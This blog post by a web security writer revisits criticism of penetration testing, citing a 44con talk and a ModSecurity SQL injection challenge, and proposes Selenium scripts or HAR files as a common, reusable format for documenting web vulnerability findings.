The Forlorn Followup

Close to a year ago I wrote an article decrying the futility of pen testing that periodically gets resuscitated on Twitter. In relatively stark terms, it called out reasons why manual web testing remains important, but insufficient, inconsistent, and imperfect. The intent was to push the boundaries of the comfort zone in which we accept, “It’s always been done this way and therefore always will.”

Recently Haroon Meer explored this topic more thoroughly at 44con with the presentation, “Penetration Testing considered harmful today“. I recommend watching the recorded presentation or reviewing the slides. Just as the topic has enormous potential for concern trolling and indifferent dismissal, it has potential for constructive discussion. If you’re a pen tester, set aside the idea that you’ve been personally attacked by the mere hint of criticism. Instead, consider the points made about the importance of pen test quality, evaluating real-world threats vs. the threat posed by a single test team, and how or why large organizations still suffer compromises (from Sony to RSA to certificate authorities). Answer those questions well and you’ll establish yourself as a premium service rather than a disposable commodity.

The question, “Are we actually improving anything?” isn’t unique to pen testing. Security software needs the same attention (thus recurring questions about whether AV remains  relevant1). Last year’s modsecurity challenge produced several good lessons (and should be commended for transparency). One interesting lesson related to pen testing was that the “Time to Hack” a site with SQL injection was about 10 hours. Don’t generalize that number beyond the challenge itself, but consider how relatively short that is in terms of finding and exploiting a vulnerability — all the while bypassing a basic set of modsecurity rules. Would the pen testing team you hired be as efficient or effective? And then what would you do if you had 100 similar sites to review? Hire another 100 pen test teams?

Let’s return to web app testing. I previously lamented the lack of coherent formats for sharing test results. Static PDF files are poor enablers of improving and maintaining security after a pen test, regardless of how well-described a vulnerability may be. Instead of (or in addition to) a snapshot of the app’s stance, a collection of re-usable data would help developers not only review findings, but ensure those vulnerabilities aren’t reintroduced.

I don’t yet have a complete picture to share of what this web testing lingua franca would be. A first step is taking something like Selenium: Open Source, well supported, and based on the universal web language JavaScript. The HTTP Archive (HAR) format also promises to be useful in this regard. The ultimate goal would be to:

  • Provide a common format for reproducing proof of a vulnerability.
  • With relatively self-explanatory documentation (web developers should be familiar with JavaScript regardless of whether the site uses PHP, Ruby, Java, C#, C++, QBasic, etc.).
  • In a manner that can be easily understood by another pen tester (if you’re a pen tester and don’t know basic JavaScript…).
  • In a manner that can be easily executed by a non-technical consumer (e.g. just need a browser and an Open Source plugin).

Selenium isn’t perfectly suited as a universal approach to cataloging web vulns, but it’s close. On the one hand, with JavaScript you don’t have to leave the browser. On the other, a Selenium script still needs some massaging to deal with form-based authentication or otherwise create a session context to reach the vulnerable resource. Both of these are feasible, so this isn’t a drawback inherent to the tool. However, it will be limited to the Same Origin Policy and other browser restrictions (which could make reproducing cookie- or header-based attacks difficult).

In another example scenario, you’d have to figure out how to modify the Selenium script to bypass client-side filters. (Client-side filters are legitimate for limiting unnecessary traffic by preventing honest users from making honest mistakes. This isn’t an endorsement of client-side filters, but a nod to reality that such a script would have to be dealt with.) Again, this could be done, but likely with raw JavaScript rather than any of Selenium’s pre-defined functions.

Whether you agree or not with the “Futility” article or Haroon’s presentation, trolling 140 characters at a time adds little to the conversation. Why not find a better outlet to prove pen testing is already perfect (!?) or improve its accepted deficiencies. If you can code, there are projects to contribute to like

If you like to write words instead of code, there are projects like the OWASP Testing Guide or adding more language-oriented examples of countermeasures for the OWASP Top 10. It never hurts to improve the signal to noise ratio of web security.

=====
The sandboxing in mobile devices lessens the utility of anti-virus in the desktop sense; however, tools to protect privacy, detect malicious apps, or detect undesirable apps (that intentionally scrape data) are important.